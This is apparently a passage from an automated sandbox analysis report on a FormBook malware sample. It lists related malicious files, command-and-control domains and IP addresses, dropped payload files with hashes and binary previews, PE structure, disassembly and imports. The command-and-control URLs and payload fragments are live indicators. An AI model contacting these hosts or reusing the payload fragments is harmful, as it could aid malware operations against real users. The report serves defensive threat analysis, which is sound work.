                                                  • www.1secondlending.one/j8pv/?ChhG6=J-xs&2O=JIuj9wxSnK6mEyWE+aiov6ee/jFUGAOavn5HAjA8ht24L6v+vQ9uqWj6ig59Dwg+VmGSo2u3Iy71OFL1070b+iEHSPgDI61AbnX1cIuegQgrBk3SzXJVVb4=
                                                  Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                  • www.1secondlending.one/j8pv/
                                                  PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                  • www.1secondlending.one/6pwo/
                                                  PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                  • www.1secondlending.one/j8pv/
                                                  Project Breakdown Doc.exeGet hashmaliciousFormBookBrowse
                                                  • www.1secondlending.one/6pwo/

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  www.wine-drinkers.clubPAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                  • 194.245.148.189
                                                  Project Breakdown Doc.exeGet hashmaliciousFormBookBrowse
                                                  • 194.245.148.189
                                                  www.supernutra01.onlineu549ed5dEA.exeGet hashmaliciousFormBookBrowse
                                                  • 188.114.96.3
                                                  ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                  • 172.67.220.36
                                                  01152-11-12-24.exeGet hashmaliciousFormBookBrowse
                                                  • 104.21.24.198
                                                  DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                  • 172.67.220.36
                                                  PO_1111101161.vbsGet hashmaliciousFormBookBrowse
                                                  • 104.21.24.198
                                                  PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                  • 104.21.24.198
                                                  Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                  • 104.21.24.198
                                                  DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 104.21.24.198
                                                  CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                  • 172.67.220.36
                                                  CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                  • 172.67.220.36
                                                  www.1secondlending.oneRecibos.exeGet hashmaliciousFormBookBrowse
                                                  • 43.205.198.29
                                                  Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 43.205.198.29
                                                  Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                  • 43.205.198.29
                                                  PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                  • 43.205.198.29
                                                  CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                  • 43.205.198.29
                                                  PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                  • 43.205.198.29
                                                  CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                  • 43.205.198.29
                                                  Project Breakdown Doc.exeGet hashmaliciousFormBookBrowse
                                                  • 43.205.198.29
                                                  CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                  • 43.205.198.29

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  CLOUDFLARENETUSpsibx9rXra.exeGet hashmaliciousFormBookBrowse
                                                  • 23.227.38.74
                                                  ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                  • 104.21.96.1
                                                  invoice_AG60538.pdfGet hashmaliciousUnknownBrowse
                                                  • 172.64.41.3
                                                  CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                  • 104.21.32.1
                                                  bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                                  • 104.21.7.187
                                                  m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                  • 104.21.96.1
                                                  Message 2.emlGet hashmaliciousUnknownBrowse
                                                  • 172.64.41.3
                                                  FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                  • 104.21.96.1
                                                  jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                  • 104.21.96.1
                                                  frosty.arm.elfGet hashmaliciousMiraiBrowse
                                                  • 104.23.145.230
                                                  CSLDEOVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                  • 194.245.148.189
                                                  KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                  • 194.245.148.189
                                                  miori.arm.elfGet hashmaliciousUnknownBrowse
                                                  • 194.245.229.87
                                                  sh4.elfGet hashmaliciousMiraiBrowse
                                                  • 194.245.229.64
                                                  Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                                  • 194.245.230.66
                                                  nabmips.elfGet hashmaliciousUnknownBrowse
                                                  • 159.25.86.139
                                                  nshkmpsl.elfGet hashmaliciousMiraiBrowse
                                                  • 194.245.230.82
                                                  z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                  • 194.245.148.189
                                                  x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 194.245.186.15
                                                  PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                  • 194.245.148.189
                                                  LILLY-ASUSfrosty.arm.elfGet hashmaliciousMiraiBrowse
                                                  • 43.62.215.242
                                                  frosty.spc.elfGet hashmaliciousMiraiBrowse
                                                  • 40.222.102.237
                                                  frosty.x86.elfGet hashmaliciousMiraiBrowse
                                                  • 42.64.174.137
                                                  frosty.sh4.elfGet hashmaliciousMiraiBrowse
                                                  • 40.58.230.116
                                                  secured File__esperion.com.htmlGet hashmaliciousPhisherBrowse
                                                  • 43.153.232.152
                                                  secured File__esperion.com.htmlGet hashmaliciousPhisherBrowse
                                                  • 43.152.64.207
                                                  sora.arm.elfGet hashmaliciousMiraiBrowse
                                                  • 40.28.234.65
                                                  3.elfGet hashmaliciousUnknownBrowse
                                                  • 40.6.208.55
                                                  5.elfGet hashmaliciousUnknownBrowse
                                                  • 43.126.67.223
                                                  5.elfGet hashmaliciousUnknownBrowse
                                                  • 43.15.214.40
                                                  COGENT-174USpsibx9rXra.exeGet hashmaliciousFormBookBrowse
                                                  • 154.23.178.183
                                                  OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                  • 38.181.21.178
                                                  pKXxiawkTj.exeGet hashmaliciousXWormBrowse
                                                  • 154.39.0.150
                                                  frosty.arm.elfGet hashmaliciousMiraiBrowse
                                                  • 154.62.137.46
                                                  frosty.spc.elfGet hashmaliciousMiraiBrowse
                                                  • 38.148.77.12
                                                  frosty.sh4.elfGet hashmaliciousMiraiBrowse
                                                  • 23.154.10.225
                                                  cNDddMAF5u.exeGet hashmaliciousFormBookBrowse
                                                  • 154.23.178.231
                                                  zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                  • 38.181.21.54
                                                  https://sign-as.allarknow.online/Get hashmaliciousUnknownBrowse
                                                  • 50.7.127.10
                                                  http://pdfdrive.com.coGet hashmaliciousUnknownBrowse
                                                  • 143.244.56.53

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Temp\320lF200

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\powercfg.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                  Category:dropped
                                                  Size (bytes):196608
                                                  Entropy (8bit):1.1221538113908904
                                                  Encrypted:false
                                                  SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                  MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                  SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                  SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                  SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\aut2D31.tmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\wWXR5js3k2.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):10806
                                                  Entropy (8bit):7.4826163425545404
                                                  Encrypted:false
                                                  SSDEEP:192:J1Eu3FqgxVh4QgU0nIWW7j6QWLqngZsIsv26W26KXbkEB/:JjVh4QgU4Id7jRWGncZsvs2TXbkEF
                                                  MD5:5D201F82EFD947F911484C1BB5B1DE5C
                                                  SHA1:EEE9C3182A82B81E0496B7DA3DCAE5472B091B7D
                                                  SHA-256:64253D19E548B8A144BC1ACFAE1D2445D214327CAA9A386072C1B8899EEE6C37
                                                  SHA-512:1F8260F476233DE54E69F277130D20FBDC4F2FF4788C8DC84D19FCE2ABB49FF69FBE2E17013E87B612F7779CAF0D1663A310616EF88C1BCB93B73C1663139958
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:EA06..p..MlV9...2.L&.y.`..Nf.I...&.M.3 .,N'.P..X@..c.....e.L..q0.....2....i8....m9.-.p.m.......@..d.Y..k..n.....N.....X@.........l.@....Y&...... ...`fs..$......`.u............p.......`....L.`...Zi9..v..W....l.{..M.^.....@.....'30...G{e.....w.....X@i.8..{h..3K....S..mL.=..!...v.Z....]..`..S.....|..9..rjd....N...:.4....`.5.o5.Y,.i..kc...@.`....Y....h.-...(.X...+,.od...VI...c..'.)....y..z.d..l......Y....e.Y... .g,.)....`.......Z.,..o6..!h...k ..5...|@O..[@...L.!>y..h.Y..g3...G.0.Y,.I..'.d.L,@..(.i5.X.lvK$....Xf......t.....lsy...d..B|S........&. ..i5...s..Y...ae...g3.4..s.L.s..O.k1.M.,>[$.gd.X.ls.....@...Ll...,.a2...|.....S........ .ba6..)l.....S....[`..........@...ob...j......mc.B.l........q&.._..36.L' JZ..!n.b...l......F.....c8..&...Rgd.L.$...S0.Nl@}..b...,sY...<.X.f...k8.N&.....c.M...2..............4.P.,.9..b...(.0..M.Q1b..@. .H.a..@.....7S... .;.L.'s1.M."`...`....@.............5..&.......J..kS..........'..X.L'......&....zb.d.L....b..&SI.A.3.....a:kf....h..a..f.Rh.

                                                  C:\Users\user\AppData\Local\Temp\aut2DFD.tmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\wWXR5js3k2.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):289792
                                                  Entropy (8bit):7.992456378879009
                                                  Encrypted:true
                                                  SSDEEP:6144:QKzTttzrvDbtOz3TBq5NdJsIcacOWcwS7CcoZe2a:QqrbCZJnShoNa
                                                  MD5:E344F9FEFD8E172F3EDA2D79A5051804
                                                  SHA1:EDFCC265011CECFF50609485CE46052CD48D62E8
                                                  SHA-256:FA59FA82194B3FE06FF6D8085782EB3150BCD64B76B7F365EA3DC4D2B2BEB940
                                                  SHA-512:C3D5750B1E16B82FDED759B94DA9D4E103DCC8E792B0078AC8B1CB82BE246CBFA94F53B01D2D78DC68373EED74BBCE1AE254D7C1C177D2C4FEAB424C29561B40
                                                  Malicious:false
                                                  Preview:x..73KDT6Q5K..0K.T2Q5KO7pKDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q.KO7>T.Z2.<.n.1..uf9\8oGB$#&S<.(.Y^$0tP4.9:Y."*tv.fk"XT.jY?[.KO70KDTKP<.rWW.y4U..+(.*...1R.U...x4U./....+#.`8V#rWW.DT2Q5KO7`.DT~P4K.,Z.DT2Q5KO7.KFU9P>KOm4KDT2Q5KO7._DT2A5KOG4KDTrQ5[O70IDT4Q5KO70KBT2Q5KO70;@T2S5KO70KFTr.5K_70[DT2Q%KO'0KDT2Q%KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KaCU30T2QA.K70[DT2.1KO'0KDT2Q5KO70KDT.Q5+O70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q

                                                  C:\Users\user\AppData\Local\Temp\caulds

                                                  Download File
                                                  Process:C:\Users\user\Desktop\wWXR5js3k2.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):289792
                                                  Entropy (8bit):7.992456378879009
                                                  Encrypted:true
                                                  SSDEEP:6144:QKzTttzrvDbtOz3TBq5NdJsIcacOWcwS7CcoZe2a:QqrbCZJnShoNa
                                                  MD5:E344F9FEFD8E172F3EDA2D79A5051804
                                                  SHA1:EDFCC265011CECFF50609485CE46052CD48D62E8
                                                  SHA-256:FA59FA82194B3FE06FF6D8085782EB3150BCD64B76B7F365EA3DC4D2B2BEB940
                                                  SHA-512:C3D5750B1E16B82FDED759B94DA9D4E103DCC8E792B0078AC8B1CB82BE246CBFA94F53B01D2D78DC68373EED74BBCE1AE254D7C1C177D2C4FEAB424C29561B40
                                                  Malicious:false
                                                  Preview:x..73KDT6Q5K..0K.T2Q5KO7pKDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q.KO7>T.Z2.<.n.1..uf9\8oGB$#&S<.(.Y^$0tP4.9:Y."*tv.fk"XT.jY?[.KO70KDTKP<.rWW.y4U..+(.*...1R.U...x4U./....+#.`8V#rWW.DT2Q5KO7`.DT~P4K.,Z.DT2Q5KO7.KFU9P>KOm4KDT2Q5KO7._DT2A5KOG4KDTrQ5[O70IDT4Q5KO70KBT2Q5KO70;@T2S5KO70KFTr.5K_70[DT2Q%KO'0KDT2Q%KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KaCU30T2QA.K70[DT2.1KO'0KDT2Q5KO70KDT.Q5+O70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q5KO70KDT2Q

                                                  C:\Users\user\AppData\Local\Temp\piceworth

                                                  Download File
                                                  Process:C:\Users\user\Desktop\wWXR5js3k2.exe
                                                  File Type:ASCII text, with very long lines (28674), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):28674
                                                  Entropy (8bit):3.5735499298872506
                                                  Encrypted:false
                                                  SSDEEP:768:Mu8vDyvojb1UiS6XdHr4iHiTogmPNoFma:wDoojb1UP6Zr4iHiToRSma
                                                  MD5:229FB6BC57A6D0E975A39A18AAFFD395
                                                  SHA1:D440F95F4C38F5EFC0A33F4051BA5E957C3490AF
                                                  SHA-256:7D28F04A0A659D688A31DC1772DD9887F84DCC2C2B05FE4558F18072363CDFF0
                                                  SHA-512:66CDD8EED4654C17445BF1F9F216D2D9AFDA2E2368DA388DCB72C981245EC895825C0134A0A3B0DC9DD654B20FFB2DC7269F4FE21B5EE847B8533D7988FA245A
                                                  Malicious:false
                                                  Preview:x5bc1cc200678b00069549500069d6a200069588e000695a9500069dcac000695e8300069509200069d2ae00069548400069569c00069d8ac000695a30695c9e00069d4fffa40006956fff840006958fff9c00069dafffac000695cfff8e000695efff9400069d0fffac0006952fff8c0006954fff3969d6fffa500069508300069529500069d4a200069568300069589200069daae000695c84000695e9c00069d0ac00069523069549100069d8fffa4000695afff86000695cfff9100069defffa00006950fff890006952fff9300069d4fffa20006956fff8e0006958fff9400069dafffac000695cfff8c000695efff3969d0a300069508800069529c00069d4a700069568100069589000069daa9000695c8e000695e9400069d0ac00069528c00069543969d6a3000695888000695a9500069dcac000695e8c00069509300069d2a200069548e00069569400069d8ac000695a8c000695c3969de754dff7c5cd54dff958dff75cdff19e4d54dff950eff754eff2e77dd4dff9d8eff75ceff8b86d58dff950eff754effade9d5cdff958eff75ceff2dbeddcdff9d0eff754effd260d54dff958eff75ceff9860d5cdff950eff754eff5764ddcdff9d8eff75ceff6d69d50dff950eff754eff892bd50dff958eff75ceff8d2eddcdff9d0eff754effd944d50dff958eff75ceffe98bd54df

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.116731243694267
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:wWXR5js3k2.exe
                                                  File size:1'326'080 bytes
                                                  MD5:9d8150f9b27a2a93925717d361add951
                                                  SHA1:92f4860eda8a22e43fc777b64c590891280d6a80
                                                  SHA256:919e47baabe9cc5fe28aa098991efc624b4cfe2c4008ce036a35b49edc438a4d
                                                  SHA512:f42b18b50e89001466a1ddf3a88b35b5139ba1d1f0988e208a25629df3733caf80e38d749b783ce297a434b6a1365bfd6d958254649c6573db78e1932f57b799
                                                  SSDEEP:24576:7u6J33O0c+JY5UZ+XC0kGso6FaOFfrcHNZs9rBNwBV9m1JHeWY:1u0c++OCvkGs9FaOVcM9r4A/Y
                                                  TLSH:8255BF12A3DD8360CA665633BF2A77016E7B7C256D34F85B1F843C79AB731A1122C663
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                  File Icon

                                                  Icon Hash:0d61030111110104

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x427dcd
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x675F772D [Mon Dec 16 00:41:17 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:1
                                                  File Version Major:5
                                                  File Version Minor:1
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:1
                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                  Entrypoint Preview

                                                  Instruction
                                                  call 00007FD7C5130C9Ah
                                                  jmp 00007FD7C5123A64h
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push edi
                                                  push esi
                                                  mov esi, dword ptr [esp+10h]
                                                  mov ecx, dword ptr [esp+14h]
                                                  mov edi, dword ptr [esp+0Ch]
                                                  mov eax, ecx
                                                  mov edx, ecx
                                                  add eax, esi
                                                  cmp edi, esi
                                                  jbe 00007FD7C5123BEAh
                                                  cmp edi, eax
                                                  jc 00007FD7C5123F4Eh
                                                  bt dword ptr [004C31FCh], 01h
                                                  jnc 00007FD7C5123BE9h
                                                  rep movsb
                                                  jmp 00007FD7C5123EFCh
                                                  cmp ecx, 00000080h
                                                  jc 00007FD7C5123DB4h
                                                  mov eax, edi
                                                  xor eax, esi
                                                  test eax, 0000000Fh
                                                  jne 00007FD7C5123BF0h
                                                  bt dword ptr [004BE324h], 01h
                                                  jc 00007FD7C51240C0h
                                                  bt dword ptr [004C31FCh], 00000000h
                                                  jnc 00007FD7C5123D8Dh
                                                  test edi, 00000003h
                                                  jne 00007FD7C5123D9Eh
                                                  test esi, 00000003h
                                                  jne 00007FD7C5123D7Dh
                                                  bt edi, 02h
                                                  jnc 00007FD7C5123BEFh
                                                  mov eax, dword ptr [esi]
                                                  sub ecx, 04h
                                                  lea esi, dword ptr [esi+04h]
                                                  mov dword ptr [edi], eax
                                                  lea edi, dword ptr [edi+04h]
                                                  bt edi, 03h
                                                  jnc 00007FD7C5123BF3h
                                                  movq xmm1, qword ptr [esi]
                                                  sub ecx, 08h
                                                  lea esi, dword ptr [esi+08h]
                                                  movq qword ptr [edi], xmm1
                                                  lea edi, dword ptr [edi+08h]
                                                  test esi, 00000007h
                                                  je 00007FD7C5123C45h
                                                  bt esi, 03h
                                                  jnc 00007FD7C5123C98h

                                                  Rich Headers

                                                  Programming Language:
                                                  • [ASM] VS2013 build 21005
                                                  • [ C ] VS2013 build 21005
                                                  • [C++] VS2013 build 21005
                                                  • [ C ] VS2008 SP1 build 30729
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [ASM] VS2013 UPD4 build 31101
                                                  • [RES] VS2013 build 21005
                                                  • [LNK] VS2013 UPD4 build 31101

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x7b24c.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1430000x711c.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0xc70000x7b24c0x7b400f5fe3e684448d35891964b7216a5ebc9False0.8383323561105477data7.4335009524873605IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x1430000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0xc75480x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                  RT_ICON0xc76700x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                  RT_ICON0xc77980x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                  RT_ICON0xc78c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 5905 x 5905 px/mEnglishGreat Britain0.4397163120567376
                                                  RT_ICON0xc7d280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 5905 x 5905 px/mEnglishGreat Britain0.3449812382739212
                                                  RT_ICON0xc8dd00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 5905 x 5905 px/mEnglishGreat Britain0.3120331950207469
                                                  RT_ICON0xcb3780x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 5905 x 5905 px/mEnglishGreat Britain0.2896197449220595
                                                  RT_ICON0xcf5a00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 5905 x 5905 px/mEnglishGreat Britain0.24670235419377737
                                                  RT_ICON0xdfdc80xe41ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain1.000188362615158
                                                  RT_MENU0xee1e80x50dataEnglishGreat Britain0.9
                                                  RT_STRING0xee2380x594dataEnglishGreat Britain0.3333333333333333
                                                  RT_STRING0xee7cc0x68adataEnglishGreat Britain0.2747909199522103
                                                  RT_STRING0xeee580x490dataEnglishGreat Britain0.3715753424657534
                                                  RT_STRING0xef2e80x5fcdataEnglishGreat Britain0.3087467362924282
                                                  RT_STRING0xef8e40x65cdataEnglishGreat Britain0.34336609336609336
                                                  RT_STRING0xeff400x466dataEnglishGreat Britain0.3605683836589698
                                                  RT_STRING0xf03a80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                  RT_RCDATA0xf05000x517e6data1.0003325364441968
                                                  RT_GROUP_ICON0x141ce80x5adataEnglishGreat Britain0.7888888888888889
                                                  RT_GROUP_ICON0x141d440x14dataEnglishGreat Britain1.25
                                                  RT_GROUP_ICON0x141d580x14dataEnglishGreat Britain1.15
                                                  RT_GROUP_ICON0x141d6c0x14dataEnglishGreat Britain1.25
                                                  RT_VERSION0x141d800xdcdataEnglishGreat Britain0.6181818181818182
                                                  RT_MANIFEST0x141e5c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                  Imports

                                                  DLLImport
                                                  WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                  WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                  PSAPI.DLLGetProcessMemoryInfo
                                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                  USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                  UxTheme.dllIsThemeActive
